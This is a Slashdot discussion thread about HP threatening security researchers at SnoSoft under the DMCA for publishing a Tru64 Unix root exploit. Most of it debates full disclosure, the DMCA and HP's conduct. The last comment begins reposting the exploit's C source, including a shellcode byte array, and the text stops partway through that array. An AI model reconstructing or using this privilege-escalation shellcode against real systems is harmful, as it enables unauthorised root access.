[richieb]

As a community, we do ourselves an incredible injustice by lining up to defend everyone who posts an exploit as if they were an associate professor at MIT. And that's exactly the perception that the initial commentary and posting to Slashdot of this article tried to imply.

So free speech is good for academics, but not for random hacker?

What difference does it make who finds and reports a bug? The cool thing about the Internet is that you don't have to be a professor at MIT to publish security exploits. The publications speaks for itself.

And if I'm running affected software, I don't care who reports the problem - as long as I find out and get a fix.

Would you still feel the same if your bank kept your accounts on an Tru64 HP machines?

Re:DMCA Bad

[ealar+dlanvuli]

s/decade/bicential/

DMCA is about the cesation of the exchance of *PUBLIC IP* that happens to interact with private IP. The fact that it exists to destroy the "marketplace of ideas" that our country was partially founded on makes it reprehensable. The fact that it only affects a certain sector of this market is a nonissue, because the removal of any PUBLIC IP for the good of anything is "Un-American", and I'd even be so far-fetched as to say it's Un-Democratic.

How? Follow this example, while it is the extreme, it clearly shows where we are today. A new law about computer security is being discussed in congress, and they bring in some experts to share the current state of exploits. The sharing of that specific knowledge in order to allow a more informed decision by the congress would in itself be illegal. Not because the information is under a acute monopoly, but because that information is illegal in this country. I repeat, that information (Remeber, this information is PUBLIC IP) is *ILLEGAL IN THIS COUNTRY*.

For another example. Imagine that a diffrent law was under debate, a law that had some effect on "pirating" and "hacking", this law required a complete review of the current laws in the area, and thier usage. If this case goes to court, all of the records pertaining to the security vunerability will be secured legally, not just under the DMCA anymore. Congress would be unable to discuss the specifics of this vunerability, and make an informed decision about what new laws need passed.

In both of these situations, information that is clearly PUBLIC IP has been removed from the reach of our lawmakers, causing them to make less than perfect decisions. This is clearly a hinderance on democracy, and obtains that status by disrupting the free trade of public information. This information was deemed unacceptable to exist, and therefore it became illegal to share it. No other possible subset of information not covered under contractual/patent law is so bound in our free country, that makes this the first time in 2 centuries that censored an idea for being bad to a pattent holder. (ed: sorry weak tie there, couldn't think of a better one)

I believe I have upheld my value of the marketplace of ideas, and shown that by limiting democracy a free marketplace is unable to exist.

bite their own asses

[austad]

It's HP's own damn fault the flaw exists. And now they are trying to squash out legitimate publication of it. All they are doing is driving the exploit underground where only script kiddies will have access to it.

If the security community doesn't know about the flaws (and workarounds to fix them), and the script kiddies do, they are biting their own asses because they are going to have a really shitty insecure product that is going to have a reputation for being hax0red.

Yeah, the flaw was released without telling HP first, but who cares... HP needs to FIX THEIR SHIT and stop the bitching.

Back to the script-kiddy days?

[gotan]

Aparently big corporations don't want flaws in their products exposed and prefer to use lawyers to "secure" their OS. So it's back to the days when exploits floated around in usenet-news (from untracable sources) and a worm/virus had to bring down millions of systems before the softwarecompanies admit there is a security hole?

And there i thought that those companies learned to value security over marketing issues. But obviously thinking farther into the future than 3 months is uncalled for these days. Business sense is dictated by the shareholders now, and the results are shortterm tactics without overseeing the big picture (in this case that fixing security holes is more important in the long run, than sweeping them under the carpet).

Re:Dear HP (The Real Thing)

[T3kno]

To Whom It May Concern,

Due to HP's recent abuse of the DMCA I have decided to never purchase an HP or Compaq product again. I am currently the IT manager of a consulting company, who shall remain nameless due to fear of litigation, and am in line to eventually become the CIO of this rapidly growing company. I have in the past been a supporter of HP products, especially your printers and UNIX servers, and Compaq products as well, and this decision has forced me to re-evaluate my commitment to HP. I recently purchased two HP LaserJet printers, one of them has been installed, but the other is still in the box and will be returned in exchange for a different manufacturer. I have a purchasing power of tens of thousands of dollars per year, that will be growing to hundreds of thousands in the future; as well as 95% of the say as to what my company purchases. I can wholeheartedly state that we will never purchase an HP or Compaq product again. I will also be encouraging my colleauges and personal friends to stay away from HP and Compaq products in the future as well. It is time for companies to learn that not only can their CEO's cheat their shareholders out of their retirements, but they cannot use litigation to solve the problems created by their inferior products and broken business models. Thank you for your time and consideration.

Sincerely,

P.S. Please feel free to email me with any questions or comments you might have regarding this note.

Doubt that they would file suit.

[www.sorehands.com]

If they file a lawsuit, the lawsuit will be dismissed. That will cut down the size of the DMCA stick. If the case goes to appeal, it will lose thus cutting down the DMCA further.

Why when Felton stood up, they backed away? They don't have an EVIL HACKER to villify.

real reason

[norwoodites]

The real reason, they are pissed is that they fired the Tru64 people already and HP does not want to make a patch for it. HP was pissed at OpenSSH when the vulnerability in it came out. They had to hire the people back to fix the problem, now they have to hire back again.

Re:real reason

[ZxCv]

sources?

Shit storm...

[Psarchasm]

I wonder if HP realizes the shitstorm it just released on itself, every other OS manufacturer out there, and every other company and individual that codes publicly released software.

In the recent past the community itself made a reasonable effort to begin notifying developers that they had bugs in their code and give them a reasonable ammount of time to fix said code and deploy patches before making the bugs public. It wasn't a perfect system and not everyone played by the "rules" but at least people seemed to want to behave responsibly.

Now HP has thrown down the gauntlet, and given the one finger salute to every uber haxor, wannabe, script kiddie, grey hat, glam hungry geek on the planet.

Gee the "New HP" sure is acting like some old ignorant twits. You cannot police what you cannot control. And as quickly as the "security community" tried to legitimize themselves - many of them can vanish right back under the limitless depths of the ether.

Mmmmm peer to peer websurfing, mailing lists and newsgroups. Masked behind proxy after proxy. Hosted on a million webservers. *Homer Gurgle*

Leave it to crackers

[richieb]

Frankly, I think that all the security experts should stop looking at Tru64 and just publicize the fact that they don't recomend it for uses where security is required.

Let the crackers have it.

Re:Leave it to crackers

[BlowCat]

The alternative is chmod -s /usr/bin/su

There are other ways to become root, e.g. ssh root@localhost with private key authentication.

Re:Leave it to crackers

[Fjord]

Debian has an Alpha port and, while I don't know how complete the packages are, Debian tends to have above 90% of the packages as aptable binaries on each platform.

Re:Leave it to crackers

[richieb]

Is Tru64 really that unsecure compared with Solaris/HP-UX.

[...]

Do you have anything else to base your opinion on? I'm not flaming, I'm actualy after a serious answer.

I don't know if Tru64 is anymore unsecure than Solaris or Linux. However, the point is that if security experts who look for holes, stop analyzing Tru64 as part of their work, Tru64 will become less secure. You know, fewer eyeballs find fewer bugs.

Since HP wants to sue programmers who, without pay, find bugs in their code, why should the programmers be helping HP? Let HP suffer the consequences.

Imagine if some car company XYZZY produced a car and they threatened to sue "Consumer Reports", if "Consumer Reports" released test results on this car. All "Consumer Reports" would have to say to avoid a suit is "we did not test this car from XYZZY, because they did not want us to". What would you think?

Is this a serious enough answer?

Watch the tickertape!

[Black+Parrot]

It might be interesting to watch HP's stock values, if word of this gets out before a patch does.

The Hewlett Compaqard Way...

[Lobsang]

Yes... Things change... Now, it's called the Hewlett Compaqard way... and it will go downhill, sadly.

Cluestick

[the+eric+conspiracy]

What is the difference between a private company and a public company?

The public company sells stock on a public exchange. This makes it subject to certain financial disclosure requirements. A private company is generally owned by its principals who are also generally involved in the day to day management of the company. A private company does not have to make significant financial disclosures to the public or it's employees.

In both cases the goal of the company is to make money for its owners/investors.

In most cases the ultimate goal for a private company is to 'flip', or go public, cashing out the owners. The process of flipping is carefully engineered to present an appearence of great value where in fact there may be none.

NONE of this has anything to do with customer satisfaction other than that needed for commercial operations.

Re:Cluestick

[Glytch]

You've just answered your own question, even though you haven't thought things out to their logical conclusion. A private company tends to have an owner/owners who understand (well, more than a shareholder, anyway) how things are actually going in the company. The managers don't have the ownership screaming at them to cut costs (such as customer tech support, employee benefits, etc) every time the NASDAQ drops a hundredth of a percent. I've worked in both kinds of companies, and I kept my eyes open.

Re:Cluestick

[nathanm]

In most cases the ultimate goal for a private company is to 'flip', or go public, cashing out the owners. The process of flipping is carefully engineered to present an appearence of great value where in fact there may be none.

Not in most cases. There are many times more private, small businesses than publicly traded ones.

Also, flipping is a relatively recent phenomenon; mostly a product of the late 90s technology boom.

Re:Cluestick

[Lemmy+Caution]

Almost correct. The purpose of a privately held company is whatever the owners want it to do. If they want to break even and spend any profits on funny hats for the sales team, that's what it's for. If they want to fill their factory with toy mice and start singing in Dutch, as long as they can afford to, then that's what their for. In fact, many privately held companies - like Hershey, for example - have charters which make profit a secondary motive to some other, social cause (in the case of Hershey, it's supporting education).

Re:Cluestick

[gorilla]

In both cases the goal of the company is to make money for its owners/investors.

Not neccessarily. The goal of the comapny is to act in the way that it's owners/investors want. In many cases that means making money, but for many others that means making no money at all. A good example are many hospitals.

There is a lesson to be learned here

[Bob+Loblaw]

Companies that deal with hardware are supportive of the DMCA (makers of DVD drives, CPUs, satellite broadcasters, etc.). The reason being that it is *very* expensive for them to fix a security problem once the hardware is being sold out in the field. It involves costly recalls, shipping and reassembly. Sometimes a "fix" can be handled in firmware but not always.

Companies that deal with software are less supporting of DMCA. If they have a bug in their software, they whip out a patch, put it on their webpage and tell people to install it themselves. They have little to lose if someone hacks around their software since they can more cheaply play a game of cat and mouse with the hackers with the full source code at their disposal where the hacker has none of the proprietary code.

Re:There is a lesson to be learned here

[NullProg]

In both of your lessons, it all boils down to design. Can you, as a designer, imagine all the flaws in your design. :)

Enjoy.

My mail to Carly

[CrayDrygu]

Mrs Fiorina,

I work for a retailer -- Best Buy -- which sells a large volume of HP and Compaq products. I have long been a fan of Hewlett Packard, but some recent news is troubling me.

Kent Ferson's reaction to Phased's posting of the security vulnerability in Tru64 was nothing short of shockingly irresponsible.

Not only am I disturbed that there was no statement of any intent to fix the security hole, but I am shocked at the threat of a lawsuit under the DMCA. You should be grateful that the hole was brought to your attention before it became a widespread problem, not to mention that had you fixed it in a timely manner (as the hole was revealed to you by SnoSoft last year), this would never have been a problem.

This reaction tells me that not only is HP/Compaq concerned more with their image than with ensuring the quality of their products, but that "The New HP" would rather abuse copyright law by "shooting the messenger" than issue a responsible statement, and repair an error before it becomes a problem.

I'll be waiting in the next few days for a press release or some other statement denouncing Mr. Ferson's actions, and showing that HP has plans to repair the hole in Tru64. Until this happens, I'm not sure I'll be able to reccomend that anyone give their money to Hewlett Packard.

Looking forward to your response.

[Name Removed]

Re:My mail to Carly

[JohnA]

Wow... you work for a company that HAS ITS OWN CUSTOMERS ARRESTED and you have the nerve to complain about HP's DMCA threat?

Talk about the pot calling the kettle black...

Re:My mail to Carly

[Arcturax]

I don't see why you should blame the guy on the sales floor for that! It is the management of Best Buy who is at fault, not the individual employees, many of who were likely upset at this as well.

Re:My mail to Carly

[zerocool^]

On the other hand, it's perfectly reasonable to want to have a job. In this world, how many places could you possibly work where you completely agree with the ethics and motivations of any management team?

Food, clothing, and shelter come first. Ethics, beliefs, and protests come second. Call me weak willed, but I would be unwilling to walk out of a job because I didn't agree with the management if it was going to leave my life / family in limbo. A lot of people on slashdot like to nay-say these things, but how many would *really* be able to walk out on a salary to prove a point? When it comes to put up or shut up, I'll shut up and take my paycheck, thank you.

~Will

Re:My mail to Carly

[CrayDrygu]

"Wow... you work for a company that HAS ITS OWN CUSTOMERS ARRESTED"

No... I don't. Those actions were the decision of management at that particular location, and in no way reflect any kind of company policy.

In fact, a couple kids came into my store a couple weeks ago looking for a GF4 for $129, and after a brief chat with a manager, they got it.

Re:Why is this bad?

[akb]

actually you didn't read closely at all. If you had you would have discovered that this hole has been known for a year.

Re:Don't blame HP

[Gorimek]

I didn't say the law should be used to quash legitimate research, only that it will have that effect, as long as it's on the books.

Carly may or may not fire the VP. Either way it will have no effect whatsoever on the real problem, the DMCA.

This could turn out to be good...

[GuNgA-DiN]

If companies start to make it a habit of suing people who tell the truth about them people will stop trusting these companies. Why did they tell HP about it first? They were honest and got bitch slapped. So, next time the researchers will think twice before going to the company. Maybe they will just publish on FreeNet or leak their story on Slashdot first?

This is a marketing disaster for HP.

[Futurepower(R)]

Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.

This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irrepairable damage to HP.

We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?

It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.

Re:This is a marketing disaster for HP.

[Bruce+Perens]

Let's not get draconian yet, it could be correcting a wrong with another wrong. Maybe an apology is what is necessary, and perhaps that would teach a better lesson to all involved. But I can't say what is necessary until I see full data. All I have tonight are news reports.

Bruce

Re:This is a marketing disaster for HP.

[Baki]

Indeed it is (a marketing disaster). I have written them a letter vowing to never buy HP products again (which I have a lot in the past) if this story is true.

Yes, essentially it is the law that is wrong, but in this case it shows a company not fixing a problem they have, but instead shooting the messenger. For me from a customer perspective, that is a very very bad sign (not to mention it is immoral). Grrrr

Re:This is a marketing disaster for HP.

[Neil+Watson]

Let's not get draconian yes,

I'm going to wander slightly off topic here but I feel what you are saying is wrong. Today, top company exectutives seem to be above the law. They can operate their companies however they choose. No one ever seems to hold them accountable. A company goes bankrupt, thousands loose their jobs and top executives are laughing all the way to the bank. In this example an executive acts in an irresponsible manner that could affect many of his customers, and you suggest mearly a wrist slap?

Re:This is a marketing disaster for HP.

[HiThere]

Umnh... I suppose that it is conceivable that there might possibly be some vaguely plausible reason for issuing that letter.

I don't like it. I don't like any company that such a letter would come from. I can't imagine feeling that anyone who would write such a letter deserves any courtesy. Or civility. To my mind he has declared himself an enemy of humanity, were I of a theistic bent I would say an enemy of God, as that is what I really feel.

I can imagine tactical, and possibly even strategic, reasons to not do anything immediately. Believing in them is a lot more difficult.

Re:This is a marketing disaster for HP.

[Reziac]

Rule #1 when firing someone: make sure you already *know* who you plan to replace them with, AND that the replacement is more competent than the guy you fired. Because otherwise, you may find that whoever replaces 'em is WORSE.

BTW this applies when getting rid of *anything* that once done away with, must be replaced.

A Scenario...

[pla]

Imagine...

You have a brand-new deadbolt lock installed on your front door.

A month later, a master key for your lock's exact model leaks out.

Every thief within a hundred miles has a key to your front door, they just have to notice that it fits to rob you blind.

Fortunately, a neighborhood watch group got wind of the leaked key, and started publicising it heavily, saving countless people from break-ins.

So who does the lock manufacturer go after, on learning of this problem?

Not the engineer who stupidly designed a master-keyed lock for the general public...

Not the thieves who make use of this information...

Not even the problem itself, which would take only a limited recall and almost no effort to correct...

Instead, they go after the neighborhood watch group, on some shaky grounds about loss of confidence in the company.

It strikes me as a *DAMNED* good thing that we only have such f'd up laws relating to computers, rather than physical security. Oh, wait, one *could* read the DMCA as applying to physical security. Oops. Time to go install a 2x4 on a latch-and-hinge across my front door.

I'd wear that

[fobbman]

Anyone know if this exploit would fit on a t-shirt?

Re:I'd wear that

[fobbman]

Looks like it will!

I would post the program but apparently I'm supposed to use fewer 'junk' characters, even when posting as code. Honestly, I think that this program is much more than 'junk characters'.

Honorable Bruce Perens

[jsse]

Just in case few of us here don't know about him. You can find his homepage here
, and in his Bio you can find:

" Hewlett-Packard Corporation - 2000 to Present

Senior strategist, Linux and Open Source. I am the first Open Source evangelist to gain a role in top management of a multi-Billion-dollar corporation. On the org chart there are only three people between me and the CEO - a general manager, a vice president, and a president. Among my assignments is to challenge HP management."

So he's in position to speak up in this case.

Note: I don't know if it's redundent but I'm sure some people would like to know. I don't ask for any mod point.

Flaws in HP's legal interpretation

[guttentag]

HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft who have found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."

I would like to point out the flaws in HP's legal interpretation here, but I just don't have $500,000 right now. Maybe tomorrow. It's really a shame... five rent-free years with free meals would give me enough time to write my book about the American-- oh, I can't talk about that either. Never mind.

Re:Dear HP (The Real Thing)

[Futurepower(R)]

not only can their CEO's cheat their shareholders

not only cannot their CEO's cheat their shareholders

Thats not a solution

I dont see the point of taking HP to task for it.
It's a waste of time. Even if they back off .. whoopdee doo.

Please .. what we need is a change in the law.

Hackers can expose findings and report them to companies .. too often a flaw gets found and the company sweeps it under the rug maybe they'll fix it in the next version but prior versions are vulnerable.

Given the sad fact that all our politicians (not just in america but worldwide are elected by money) maybe the following compromise can be reached:

a) Hackers who find vulnerabilites must email a notice and description to the company. He must try to give at least 24 hours notice before announcing it to the public unless he knows of an imminent exploit in the wild (like an impending mass DDOS attack or something). In that case he should be allowed to announce it to the public immediately.

b) Companies that take no action (that is dont make a patch available/requestable) on a vulnerability that was reported to them but not announced to the public, are liable for exploits.

c) The setup of a third party security company or government department where hackers can email reports of finding vulnerabilities. This is like CERT or bugtraq but the organization must have the funding and capability to pursue inaction on the part of companies that do not fix reported and well documented security flaws.

Is there any way for you to use your publicity to bring something like this about?

At least try. I hate the fact that curiousity is now a crime. I am allowed to take apart my car and see how it works .. why cant I do it with the applications I use and store my depply personal information (from baby pictures to tax and health records) on?

Thanks,

Johan

Re:Thats not a solution

[mpe]

Please .. what we need is a change in the law.

Or rather the applicable law or meta-law, in this case the US Constitution actually applied.
When did the first ammendment become "Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof (except where the president likes said religion); or abridging the freedom of speech, or of the press (except when the matter involves electronic computer systems or the profits of large corporations); or the right of the people peaceably to assemble, and to petition the Government for a redress of grievances."

Re:Thats not a solution

[dillon_rinker]

Or how 'bout this..."To promote the Progress of Science and useful Arts, by securing for limited Times to Authors and Inventors the exclusive Right to their respective Writings and Discoveries;"

You don't even have to go to an amendment for this. Progress is hindered when improvement is impossible. Quashing discoveries of problems eliminates the possibility of improvement. The DMCA, among other things, can make it a crime to announce vulnerabilities in security code and devices (if those are intended to protect copyright). Ergo, the DMCA is unconstitutional.

Re:Thats not a solution

[Jonny+Ringo]

Given the sad fact that all our politicians (not just in america but worldwide are elected by money)

Not all politicians. Nader does not except any donations from Corporations.

Re:Thats not a solution

[grmoc]

The more people threatened by the DMCA and laws of its ilk the better!

What are you talking about? If few people feel threatened by the law then it remains on the books until some entity decides that can REALLY roast you.

Teddy Roosevely did this in NYC over prohibition

What will it end up to?

[jsse]

I can see it here, US Government is progressively inventing laws that ensures:

Only the Government can investigate crimes.
Only the Government can test, examine, uncover defectives in consummer products
Only the Government can perform reverse engineering on anything
Only the Government is allowed to use top-grade encryption
The scope of Free Speech is defined by senators, and it happens that no constitutional right are being intruded.

That's to say, US would become a country where citizens, by laws, SHOULD trust the Government and any questions on the already established laws and regulations are prohibited.

What's wrong with the picture? I don't know, but I've read a novel book about a country whose government has absolute power over their citizens and no citizen is allowed to question the decision of the government. This government does not use any military power or violence to control their citizens, but by laws.

IIRC at the end of this story all the citizens end up living in an array of big tubes of liquid, and the rest of the rebels are either jailed(brains were sperated from their body) or terminated(becomes food for others). It's like Matrix, but this time some humans control everything.

....Imagine, no violence, no crime, no hunger...a perfect world!

Won't use HP in my shop

[Sean+Clifford]

Well, then. This clearly demonstrates why *not* to use HP's Unix in your shop; I won't use it in mine. Nor will I use their software or services - you can't trust them. This stupid insular policy against public disclosure only ensures that (a) exploits aren't known, and (b) aren't patched, and (c) cannot be defended against.

Don't say it...don't say it...I'm warning you...

Use Linux.

Damn, I said it.

Why the fuck don't people want exploits fully disclosed? Sure, I don't have a problem with waiting a week or so to give a team/vendor (yes, even Microsoft) a chance to roll out a patch before making it public. It's a courtesy, not a necessity.

<rant />
Clearly some sort of political action is required. I suggest:

1. The DMCA needs to be repealed or ruled unconstitutional. Hopefully the ACLU or the EFF will take a case that'll get us there. Or some rich philanthropist geek could 'violate' it by exercising their constitutional rights. But the best ploy is for every one of *us* to contact (visit,snailmail,fax,call,email) 'our' reps in the House and Senate, rationally outline our objections, and protest like hell if they don't. Civil disobedience, etc.

2. Abolish corporate personhood (same methods).

3. Abolish the lobby industry.

4. Abolish campaign finance. Make it publicly funded, free TV-radio spots (public airwaves) equally distributed among ballot-qualified candidates.

We've let corporations have far too much swing. I'm all for making a buck, but Jesus F***ing Christ...

Re:Won't use HP in my shop

[zoombat]

Or you can Email Carly.

Comment removed

[account_deleted]

Comment removed based on user account deletion

As a pre-merger HP employee...

[blackwizard]

... while I don't think the guy should have released the exploit while they were still talking to HP about the fix, I think the management of HP has been making some heavy-handed decisions. Not just moves like this, but in general... ever since Bill and Dave passed away, it seems the company has lost its heart. It's sad, really.

I hope you can point them in the right direction, Bruce... and I hope whoever owns this defect has a patch out by tomorrow at noon. =) I know if I owned that code, and I saw this article, I'd be working night and day to get a resolution...

Of course, this is probably Compaq (a "wholly owned subsidary" of HP) that we're talking about, so maybe my company isn't going to hell as fast as some might think.

My letter to my Representative and Senators

[LordNimon]

This is a letter I just sent to my Representative and Senators. Permission is given to anyone who wants to use this text to send a similar letter.

Today I read an article on news.com (http://news.com.com/2100-1023-947325.html) that Hewlett-Packard has intended to use the Digital Millennium Copyright Act (DMCA) to punish a company that has released information about a security vulnerability in an HP product. For quite some time I have been telling you that the DMCA is a bad law that needs to be repealed, and this is just more evidence to that effect. HP has known about this vulnerability for a year, but has chosen to do nothing to fix it.

HP's action could set a precedent that would stifle technology research. Companies would be free to release broken technologies that would eventually be used in high-security environments. Anyone who attempted to test the strengths of these products would be branded a criminal.

HP's customers and the American public deserve to know about security issues in HP's products. Withholding such information is just like the accounting scandals that have been rampant in recent times. Insecure technology is a weapon that hackers and terrorists can use against us. So when an American company decides to hide behind an American law rather than fix it products, our politicians need to re-examine that law.

I urge you to sponsor legislation that will repeal the DMCA. Americans deserve better. Please write back to me and let me know that you support my fair use rights in a digital world, and that you'll be working to repeal the DMCA.

I need your call on this, please, folks.

[Bruce+Perens]

Folks,

In my investigation, I read the Snosoft home page. This is the second sentence of their introductory paragraph:

Our advisory release policy is full disclosure unless bound by contract.

Now, I don't know any of the people involved or how they really do business, and thus I am not ready to make any allegations. But that sentence sounds a bit like a shakedown, doesn't it?

I would hate to be manipulated in a shakedown of my own company.

On the other hand, some people say this is a year-old bug and that there was long correspondence before one of the employees finally revealed it. I don't know if that's true yet.

What do you think?

Bruce

Re:I need your call on this, please, folks.

[friedmud]

Bruce,

I guess I don't understand how full disclosure can equate to a shakedown.

The company (snosoft) seems like a more or less legit research company, and the fact that they have a full disclosure policy in no way says that they are trying to take out companies. It just says, up front, that they have a policy of disclosing these security breaches that they find.

On the other hand they have to make money somehow - so they contract out their services to companies who wish to have their software audited.

I could be wrong, but by looking through their posts on security focus, I don't think they are out to extort money from companies - and this is especially true if they gave HP a year to fix this problem (in fact if that is true then you should REALLY stick it to the top brass).

It could go either way - but it doesn't look like they are in the business of extortion. And the fact that they have been around for a while, and seem to be respected in the security community says quite a lot....

ON THE OTHER HAND.... I don't see how it is in any way shape or form right for HP to sick the DMCA on them, no matter what their business practices are. This is a vulnerability in HPQ's software and should not be treated with such arrogance (don't report it or else!).

Just my $.02

Derek

Re:I need your call on this, please, folks.

[Bruce+Perens]

I read "full disclosure unless bound by contract" as "full disclosure unless you pay us to hide what we found". If I had written that page, I would have spun that line differently. I don't yet know if my (admittedly paranoid) interpretation represents the way they operate, or not.

Bruce

Re:I need your call on this, please, folks.

[0xA]

I get the same impression.

Re:I need your call on this, please, folks.

[_Sprocket_]

It looks like that text has been removed - at least, I don't notice it at that URL (or during a cursory search through the site). Having said that - this does put forward an interesting question.

How are contracted researchers expected to behave in such a situation?

It seems that the usual "full disclosure" notice comes from an audit of a product by an external group / individual without contract or invitation by the producer of that product (publicity-grabbing "hacker challenges" aside). Such reports certainly warn the product's user base. But they also seem to be an attempt to embarass the producer of that product to action - patching the current issue and perhapse increasing future quality control.

What if the research group is hired by WidgetSoft to audit the Widget2000 and they discover a major vulnerability? It is unlikely the public will ever hear of it from the research group. WidgetSoft will likely develop the patch, and release it with their own report based on the research group's findings.

But what if WidgetSoft decides to bury the findings? Then our hypothetical research group has a dilema. It would be wise for this group to be sure their business contract specifically avoids conflicting with their morals.

Unless, of course, they're in the business of the shake-down.

Re:I need your call on this, please, folks.

[AftanGustur]

I read "full disclosure unless bound by contract" as "full disclosure unless you pay us to hide what we found".

Don't let your personal emotions of the moment blind your professionalism..

Re:I need your call on this, please, folks.

[thales]

Bruce,
Even if it was a company that engaged in outright extortion, ie "we just found this hole, pay us $10,000 by Friday or we release it", some advice my Mother gave me comes to mind.

Two Wrongs Don't Make a Right

HP's Customer's are inocent third parties in this matter. Once the exploit was released, no matter how shady the people who released it were, HP should have been trying to notify it's customers instead of engaging in a futile attempt to put the cat back in the bag. HP has increased the harm to innocent third parties by not contacting them, and now their actions have insured that the code for the exploit is more widely distrubited than before.

SnoSoft's actions may have been wrong, but that did not give HP a license to engage in wrong actions of their own.

Re:I need your call on this, please, folks.

[MaxVlast]

Huh? I think his comment is very professional. If it is indeed something more-than-is-apparent, then critical thinking (and not just big company wrong) will leave everyone in the best stead.

Re:I need your call on this, please, folks.

[jc42]

It might be worth pointing out here that, even with a prior contract, the laws of most countries would still require disclosure at some point. No contract can be used to excuse conspiracy to commit illegal acts (such as fraud). The recent accounting scandals have brought this out quite clearly.

Tru64 Unix is openly marketed for gateway and firewall uses. If there is a known root exploit in such systems, and customers are not informed of the problem, there are good grounds for some serious charges. I'd bet that HP has a flock of lawyers looking at this right now. There's a good chance that they have some big customers also looking at it. If any Tru64 firewall has been rooted in the past year, there may be some big settlements in the news some time in the future.

If it's true that SnoSoft informed HP of the problem a year ago, then whether there's a contract between them is probably moot. The problem wasn't fixed, so most countries' laws would require SnoSoft to go public with at least the basic facts of the situation. A year is a long time to keep such information secret from vulnerable customers.

If the problem had been fixed, then we'd expect that HP would be going public with the facts (and the fix).

Re:I need your call on this, please, folks.

[Royster]

I have to say that, the way it's phrased, it does seem like an invitation to buy their silence which is a pretty sleazy way to do business. The leet handles used by the researchers dosn't give me the impression of a reputable company either.

But another poster had an excellent point. You can't be shakendown if you fix the vulnerability.

I do think that organizations like this who independantly investigate and publish their findings do the industry a service. Exploits are found and, if the give the company a chance to fix the problem, they are actually doing a service to the industry.

Don't punish the messenger even if they are not 'dressed for business'.

Re:I need your call on this, please, folks.

[AftanGustur]

Huh? I think his comment is very professional.

He was assuming (without any reference) a underlying purpose so he could suggest a underlying purpose..

That's not very professional.

Re:I need your call on this, please, folks.

[thrillbert]

I would hate to be manipulated in a shakedown of my own company

Bruce,

There are plenty of researchers who have contracts with companies, which of course prevents them from publicizing their bug discoveries. One of the most notable ones would be Georgi Guninski and Netscape/AOL. While you and I may have jobs at large companies, why would it be wrong for us to make some money by doing our research and charging companies for our work?

I wrote an email to an individual in response to his BugTraq comments, and in this email I gave him the following example:

When a car manufacturer puts out a car, and some unlucky bastard finds out of a flaw in the vehicle,this unlucky bastard never gets sued for finding this flaw in the car. On the other hand, he might be the one who gets most of the money from a lawsuit of some sort. The rest of the cars just get recalled and the problem fixed.

Software vendors should be held as accountable as car manufacturers, especially if a flaw in their software can cause monetary harm to companies running this software.

HP's attempt at preventing the disclosure of this problem would be equal to Ford and Firestone threatening the families of the crash survivors from making this information public.

Does that seem right to you? My guess is that it doesn't, since you were willing to risk a DMCA debacle on yourself.

The issue is not of liking or disliking HP/Compaq. The issue here is of common sense. Just because you have 12 billion dollars in the bank does not mean you are above the law, and it does not mean that you should be allowed to write crappy code which could cost companies money, and individuals their privacy.

-thrill

---
The world is coming to an end ... SAVE YOUR BUFFERS!!!

Re:I need your call on this, please, folks.

[uucp]

No, Bruce, Snosoft saying "Our advisory release policy is full disclosure unless bound by contract" does not seem like a shakedown to me. HP saying "If SnoSoft and its members fail to cooperate with HP, then this will be considered further evidence of SnoSoft's bad faith" seems much closer to the language used by blackmailing thugs. There is no implied threat in the former, because full disclosure is not a threat. The letter from HP to Snosoft, if the news.com report is accurate, is nothing but a threat.

That is my call on this. I answered, since you asked. And the reason why I'm not calling you on the phone telling you this is because I think (and I suspect there are others as well that feel similarly) that cold-calling someone like that would be rude. So that would explain why you're getting calls from soulless "reporters" instead of maladjusted geeks.

Re:I need your call on this, please, folks.

[snosoft]

In response to Bruce:

"But that sentence sounds a bit like a shakedown, doesn't it?"

Secure Network Operations provides system security research results to both the public and private sectors in a mutually exclusive manner. We perform independent research and maintain a full disclosure policy for such engagements. We also perform custom security research for private enterprises and government whereby disclosure is limited to our client, and bound by NDA.

We have also changed our page.

Regards,
Adriel T. Desautels
Founder, Secure Network Operations, inc.

Re:I need your call on this, please, folks.

[AftanGustur]

Reread his post. Bruce ADMITS that maybe his emotions may be influencing his view of the sentence. He simply states that if it were him he would have worded it a little differently.

No, that's not all he does, indeed he states more than that, this is the post I was replying to, in full :

I read "full disclosure unless bound by contract" as "full disclosure unless you pay us to hide what we found". If I had written that page, I would have spun that line differently. I don't yet know if my (admittedly paranoid) interpretation represents the way they operate, or not.

He states how he interprets the text, by putting words in their mouths.

A more professional approach would have been to describe his interpretation from his own standpoint, and the reasons for *why* he interprets their words in such a way.
That way, his sneaky suggestions of faule play could be reasoned.

And here is my reply to his comment:

Don't let your personal emotions of the moment blind your professionalism..

Judges do not always uphold the law

[Frank+T.+Lofaro+Jr.]

Judge Kaplan didn't let EXCEPTIONS WRITTEN INTO THE DMCA ITSELF prevent him from ruling against the DeCSS defendants.

Don't count on judges to uphold the law.

(Unless of course, the side that is right is also the side with the most money - which is rarely the case)

Security holes are a BIG deal

[Frank+T.+Lofaro+Jr.]

Computers are now being used extensively in the medical field for everything from life-support, diagnosis, treatment, medical records and billing.

Hacks on billing systems will just cause financial damage, but hacks on the other types of systems CAN KILL.

Hacking SCADA and industrial control systems can KILL and/or cause MAJOR property and environmental damage.

Security holes can literally TAKE one's life.

Lets try this again...

[User+956]

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[]=
"\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
